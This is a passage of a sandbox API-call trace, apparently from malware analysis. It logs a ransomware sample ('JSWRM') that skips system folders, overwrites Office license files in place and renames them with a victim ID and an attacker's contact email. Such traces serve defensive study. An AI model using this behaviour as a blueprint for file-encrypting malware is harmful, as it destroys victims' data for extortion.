hHeap=0x1e0000) returned 1 [0106.609] CloseHandle (hObject=0x45c) returned 1 [0106.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0106.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0106.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0106.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0106.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.612] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0106.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0106.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0106.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0106.613] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7b054c5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7b054c5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7bc4076, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_Grace-ul-oob.xrm-ms", cAlternateFileName="OUTLOO~4.XRM")) returned 1 [0106.613] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.613] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.613] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.613] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.613] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.613] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.613] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.614] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.614] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.614] lstrcmpiW (lpString1="OutlookR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0106.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241308, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_Grace-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241010, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0106.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0106.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.615] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11599) returned 1 [0106.615] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.615] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.618] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.618] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.618] CloseHandle (hObject=0x45c) returned 1 [0106.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0106.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0106.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0106.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0106.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0106.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.619] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0106.620] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a92d77, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7a92d77, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7b51982, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2993, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_OEM_Perp-pl.xrm-ms", cAlternateFileName="OUTLOO~3.XRM")) returned 1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.620] lstrcmpiW (lpString1="OutlookR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0106.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0106.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0106.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-pl.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240f48, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0106.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0106.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.621] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10643) returned 1 [0106.621] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0106.621] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0106.623] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.623] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0106.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.623] CloseHandle (hObject=0x45c) returned 1 [0106.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0106.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0106.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0106.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0106.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0106.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.624] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0106.625] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a6cae6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7a6cae6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7b2b6c6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="OUTLOO~2.XRM")) returned 1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.625] lstrcmpiW (lpString1="OutlookR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0106.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241010, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookR_OEM_Perp-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.626] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20781) returned 1 [0106.626] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 